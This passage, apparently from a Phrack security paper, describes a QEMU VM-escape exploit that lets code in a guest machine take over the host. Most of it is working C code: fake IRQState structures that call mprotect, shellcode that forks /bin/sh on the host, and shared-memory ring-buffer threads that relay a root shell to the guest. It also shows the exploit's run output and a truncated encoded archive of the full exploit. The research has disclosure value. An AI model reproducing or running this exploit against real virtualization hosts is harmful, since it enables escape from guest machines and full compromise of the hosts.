the PROT_EXEC flag of the page memory where the shellcode is located.
Our idea, is to build two fake IRQState structures. The first one is used
to make a call to mprotect(). The second one is used to call a shellcode
that will undo first the MADV_DONTFORK flag and then runs an interactive
shell between the guest and the host.
As stated earlier, when qemu_set_irq() is called, it takes two parameters
as input: irq (pointer to IRQstate structure) and level (IRQ level), then
calls the handler as following:
void qemu_set_irq(qemu_irq irq, int level)
{
if (!irq)
return;
irq->handler(irq->opaque, irq->n, level);
}
As shown above, we have control only over the first two parameters. So how
to call mprotect() that has three arguments?
To overcome this, we will make qemu_set_irq() calls itself first with the
following parameters:
- irq: pointer to a fake IRQState that sets the handler pointer to mprotect()
function.
- level: mprotect flags set to PROT_READ | PROT_WRITE | PROT_EXEC
This is achieved by setting two fake IRQState as shown by the following
snippet code:
struct IRQState {
uint8_t _nothing[44];
uint64_t handler;
uint64_t arg_1;
int32_t arg_2;
};
struct IRQState fake_irq[2];
hptr_t fake_irq_mem = gva_to_hva(fake_irq);
/* do qemu_set_irq */
fake_irq[0].handler = qemu_set_irq_addr;
fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState);
fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC;
/* do mprotect */
fake_irq[1].handler = mprotec_addrt;
fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT;
fake_irq[1].arg_2 = PAGE_SIZE;
After overflow takes place, qemu_set_irq() is called with a fake handler
that simply recalls qemu_set_irq() which in turns calls mprotect after
having adjusted the level parameter to 7 (required flag for mprotect).
The memory is now executable, we can pass the control to our interactive
shell by rewriting the handler of the first IRQState to the address of our
shellcode:
payload.fake_irq[0].handler = shellcode_addr;
payload.fake_irq[0].arg_1 = shellcode_data;
----[ 5.2 - Interactive Shell
Well. We can simply write a basic shellcode that binds a shell to netcat on
some port and then connect to that shell from a separate machine. That's a
satisfactory solution, but we can do better to avoid firewall restrictions.
We can leverage on a shared memory between the guest and the host to build a
bindshell.
Exploiting QEMU's vulnerabilities is a little bit subtle as the code we are
writing in the guest is already available in the QEMU's process memory. So
there is no need to inject a shellcode. Even better, we can share code and
make it run on the guest and the attacked host.
The following figure summarizes the shared memory and the process/thread
running on the host and the guest.
We create two shared ring buffers (in and out) and provide read/write
primitives with spin-lock access to those shared memory areas. On the host
machine, we run a shellcode that starts a /bin/sh shell on a separate
process after having duplicated first its stdin and stdout file
descriptors. We create also two threads. The first one reads commands from
the shared memory and passes them to the shell via a pipe. The second
threads reads the output of the shell (from a second pipe) and then writes
them to the shared memory.
These two threads are also instantiated on the guest machine to write user
input commands on the dedicated shared memory and to output the results
read from the second ring buffer to stdout, respectively.
Note that in our exploit, we have a third thread (and a dedicated shared
area) to handle stderr output.
GUEST SHARED MEMORY HOST
----- ------------- ----
+------------+ +------------+
| exploit | | QEMU |
| (thread) | | (main) |
+------------+ +------------+
+------------+ +------------+
| exploit | sm_write() head sm_read() | QEMU |
| (thread) |----------+ |--------------| (thread) |
+------------+ | V +---------++-+
| xxxxxxxxxxxxxx----+ pipe IN ||
| x | +---------++-+
| x ring buffer | | shell |
tail ------>x (filled with x) ^ | fork proc. |
| | +---------++-+
+-------->--------+ pipe OUT ||
+------------+ +---------++-+
| exploit | sm_read() tail sm_write() | QEMU |
| (thread) |----------+ |--------------| (thread) |
+------------+ | V +------------+
| xxxxxxxxxxxxxx----+
| x |
| x ring buffer |
head ------>x (filled with x) ^
| |
+-------->--------+
----[ 5.3 - VM-Escape Exploit
In the section, we outline the main structures and functions used in the
full exploit (vm-escape.c).
The injected payload is defined by the following structure:
struct payload {
struct IRQState fake_irq[2];
struct shared_data shared_data;
uint8_t shellcode[1024];
uint8_t pipe_fd2r[1024];
uint8_t pipe_r2fd[1024];
};
Where fake_irq is a pair of fake IRQState structures responsible to call
mprotect() and change the page protection where the payload resides.
The structure shared_data is used to pass arguments to the main shellcode:
struct shared_data {
struct GOT got;
uint8_t shell[64];
hptr_t addr;
struct shared_io shared_io;
volatile int done;
};
Where the got structure acts as a Global Offset Table. It contains the
address of the main functions to run by the shellcode. The addresses of
these functions are resolved from the memory leak.
struct GOT {
typeof(open) *open;
typeof(close) *close;
typeof(read) *read;
typeof(write) *write;
typeof(dup2) *dup2;
typeof(pipe) *pipe;
typeof(fork) *fork;
typeof(execv) *execv;
typeof(malloc) *malloc;
typeof(madvise) *madvise;
typeof(pthread_create) *pthread_create;
typeof(pipe_r2fd) *pipe_r2fd;
typeof(pipe_fd2r) *pipe_fd2r;
};
The main shellcode is defined by the following function:
/* main code to run after %rip control */
void shellcode(struct shared_data *shared_data)
{
pthread_t t_in, t_out, t_err;
int in_fds[2], out_fds[2], err_fds[2];
struct brwpipe *in, *out, *err;
char *args[2] = { shared_data->shell, NULL };
if (shared_data->done) {
return;
}
shared_data->got.madvise((uint64_t *)shared_data->addr,
PHY_RAM, MADV_DOFORK);
shared_data->got.pipe(in_fds);
shared_data->got.pipe(out_fds);
shared_data->got.pipe(err_fds);
in = shared_data->got.malloc(sizeof(struct brwpipe));
out = shared_data->got.malloc(sizeof(struct brwpipe));
err = shared_data->got.malloc(sizeof(struct brwpipe));
in->got = &shared_data->got;
out->got = &shared_data->got;
err->got = &shared_data->got;
in->fd = in_fds[1];
out->fd = out_fds[0];
err->fd = err_fds[0];
in->ring = &shared_data->shared_io.in;
out->ring = &shared_data->shared_io.out;
err->ring = &shared_data->shared_io.err;
if (shared_data->got.fork() == 0) {
shared_data->got.close(in_fds[1]);
shared_data->got.close(out_fds[0]);
shared_data->got.close(err_fds[0]);
shared_data->got.dup2(in_fds[0], 0);
shared_data->got.dup2(out_fds[1], 1);
shared_data->got.dup2(err_fds[1], 2);
shared_data->got.execv(shared_data->shell, args);
}
else {
shared_data->got.close(in_fds[0]);
shared_data->got.close(out_fds[1]);
shared_data->got.close(err_fds[1]);
shared_data->got.pthread_create(&t_in, NULL,
shared_data->got.pipe_r2fd, in);
shared_data->got.pthread_create(&t_out, NULL,
shared_data->got.pipe_fd2r, out);
shared_data->got.pthread_create(&t_err, NULL,
shared_data->got.pipe_fd2r, err);
shared_data->done = 1;
}
}
The shellcode checks first the flag shared_data->done to avoid running the
shellcode multiple times (remember that qemu_set_irq used to pass control
to the shellcode is called several times by QEMU code).
The shellcode calls madvise() with shared_data->addr pointing to the
physical memory. This is necessary to undo the MADV_DONTFORK flag and hence
preserve memory mappings across fork() calls.
The shellcode creates a child process that is responsible to start a shell
("/bin/sh"). The parent process starts threads that make use of shared
memory areas to pass shell commands from the guest to the attacked host and
then write back the results of these commands to the guest machine. The
communication between the parent and the child process is carried by pipes.
As shown below, a shared memory area consists of a ring buffer that is
accessed by sm_read() and sm_write() primitives:
struct shared_ring_buf {
volatile bool lock;
bool empty;
uint8_t head;
uint8_t tail;
uint8_t buf[SHARED_BUFFER_SIZE];
};
static inline
__attribute__((always_inline))
ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring,
char *out, ssize_t len)
{
ssize_t read = 0, available = 0;
do {
/* spin lock */
while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));
if (ring->head > ring->tail) { // loop on ring
available = SHARED_BUFFER_SIZE - ring->head;
} else {
available = ring->tail - ring->head;
if (available == 0 && !ring->empty) {
available = SHARED_BUFFER_SIZE - ring->head;
}
}
available = MIN(len - read, available);
imemcpy(out, ring->buf + ring->head, available);
read += available;
out += available;
ring->head += available;
if (ring->head == SHARED_BUFFER_SIZE)
ring->head = 0;
if (available != 0 && ring->head == ring->tail)
ring->empty = true;
__atomic_clear(&ring->lock, __ATOMIC_RELAXED);
} while (available != 0 || read == 0);
return read;
}
static inline
__attribute__((always_inline))
ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring,
char *in, ssize_t len)
{
ssize_t written = 0, available = 0;
do {
/* spin lock */
while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));
if (ring->tail > ring->head) { // loop on ring
available = SHARED_BUFFER_SIZE - ring->tail;
} else {
available = ring->head - ring->tail;
if (available == 0 && ring->empty) {
available = SHARED_BUFFER_SIZE - ring->tail;
}
}
available = MIN(len - written, available);
imemcpy(ring->buf + ring->tail, in, available);
written += available;
in += available;
ring->tail += available;
if (ring->tail == SHARED_BUFFER_SIZE)
ring->tail = 0;
if (available != 0)
ring->empty = false;
__atomic_clear(&ring->lock, __ATOMIC_RELAXED);
} while (written != len);
return written;
}
These primitives are used by the following threads function. The first one
reads data from a shared memory area and writes it to a file descriptor.
The second one reads data from a file descriptor and writes it to a shared
memory area.
void *pipe_r2fd(void *_brwpipe)
{
struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
char buf[SHARED_BUFFER_SIZE];
ssize_t len;
while (true) {
len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf));
if (len > 0)
brwpipe->got->write(brwpipe->fd, buf, len);
}
return NULL;
} SHELLCODE(pipe_r2fd)
void *pipe_fd2r(void *_brwpipe)
{
struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
char buf[SHARED_BUFFER_SIZE];
ssize_t len;
while (true) {
len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf));
if (len < 0) {
return NULL;
} else if (len > 0) {
len = sm_write(brwpipe->got, brwpipe->ring, buf, len);
}
}
return NULL;
}
Note that the code of these functions are shared between the host and the
guest. These threads are also instantiated in the guest machine to read
user input commands and copy them on the dedicated shared memory area (in
memory), and to write back the output of these commands available in the
corresponding shared memory areas (out and err shared memories):
void session(struct shared_io *shared_io)
{
size_t len;
pthread_t t_in, t_out, t_err;
struct GOT got;
struct brwpipe *in, *out, *err;
got.read = &read;
got.write = &write;
warnx("[!] enjoy your shell");
fputs(COLOR_SHELL, stderr);
in = malloc(sizeof(struct brwpipe));
out = malloc(sizeof(struct brwpipe));
err = malloc(sizeof(struct brwpipe));
in->got = &got;
out->got = &got;
err->got = &got;
in->fd = STDIN_FILENO;
out->fd = STDOUT_FILENO;
err->fd = STDERR_FILENO;
in->ring = &shared_io->in;
out->ring = &shared_io->out;
err->ring = &shared_io->err;
pthread_create(&t_in, NULL, pipe_fd2r, in);
pthread_create(&t_out, NULL, pipe_r2fd, out);
pthread_create(&t_err, NULL, pipe_r2fd, err);
pthread_join(t_in, NULL);
pthread_join(t_out, NULL);
pthread_join(t_err, NULL);
}
The figure presented in the previous section illustrates the shared
memories and the processes/threads started in the guest and the host
machines.
The exploit targets a vulnerable version of QEMU built using version 4.9.2
of Gcc. In order to adapt the exploit to a specific QEMU build, we provide
a shell script (build-exploit.sh) that will output a C header with the
required offsets:
$ ./build-exploit <path-to-qemu-binary> > qemu.h
Running the full exploit (vm-escape.c) will result in the following output:
$ ./vm-escape
$ exploit: [+] found 190 potential ObjectProperty structs in memory
$ exploit: [+] .text mapped at 0x7fb6c55c3620
$ exploit: [+] mprotect mapped at 0x7fb6c55c0f10
$ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347
$ exploit: [+] VM physical memory mapped at 0x7fb630000000
$ exploit: [+] payload at 0x7fb6a8913000
$ exploit: [+] patching packet ...
$ exploit: [+] running first attack stage
$ exploit: [+] running shellcode at 0x7fb6a89132d0
$ exploit: [!] enjoy your shell
$ shell > id
$ uid=0(root) gid=0(root) ...
----[ 5.4 - Limitations
Please note that the current exploit is still somehow unreliable. In our
testing environment (Debian 7 running a 3.16 kernel on x_86_64 arch), we
have observed a failure rate of approximately 1 in 10 runnings. In most
unsuccessful attempts, the exploit fails to reconstruct the memory layout
of QEMU due to unusable leaked data.
The exploit does not work on linux kernels compiled without the
CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case QEMU binary
(compiled by default with -fPIE) is mapped into a separate address space as
shown by the following listing:
55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64]
55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ...
55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ...
55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0
55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap]
7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0
7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM]
7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0
...
7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib]
7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ...
7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ...
7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ...
...
7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack]
7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar]
7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
As a consequence, our 4-byte overflow is not sufficient to dereference the
irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx) so
that it points to our fake IRQState structure (injected somewhere at
0x7fxxxxxxxxxx).
--[ 6 - Conclusions
In this paper, we have presented two exploits on QEMU's network device
emulators. The combination of these exploits make it possible to break out
from a VM and execute code on the host.
During this work, we have probably crashed our testing VM more that one
thousand times. It was tedious to debug unsuccessful exploit attempts,
especially, with a complex shellcode that spawns several threads an
processes. So, we hope, that we have provided sufficient technical details
and generic techniques that could be reused for further exploitation on
QEMU.
--[ 7 - Greets
We would like to thank Pierre-Sylvain Desse for his insightful comments.
Greets to coldshell, and Kevin Schouteeten for helping us to test on
various environments.
Thanks also to Nelson Elhage for his seminal work on VM-escape.
And a big thank to the reviewers of the Phrack Staff for challenging us to
improve the paper and the code.
--[ 8 - References
[1] http://venom.crowdstrike.com
[2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf
[3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c
[4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf
[5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt
[6] https://blog.affien.com/archives/2005/07/15/reversing-crc/
--[ 9 - Source Code
begin 644 vm_escape.tar.gz
M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-I<RJK*RJMML3"$H6801:0#ZV
M#R)/B6BN@<(M;4_OW[XO7R*!D+KMV)C>C8V=^B"*S'?^WI$OL3]-1W:EY<(>
...
M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU
MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH,
$`$`!````
`
end
|=[ EOF ]=---------------------------------------------------------------=|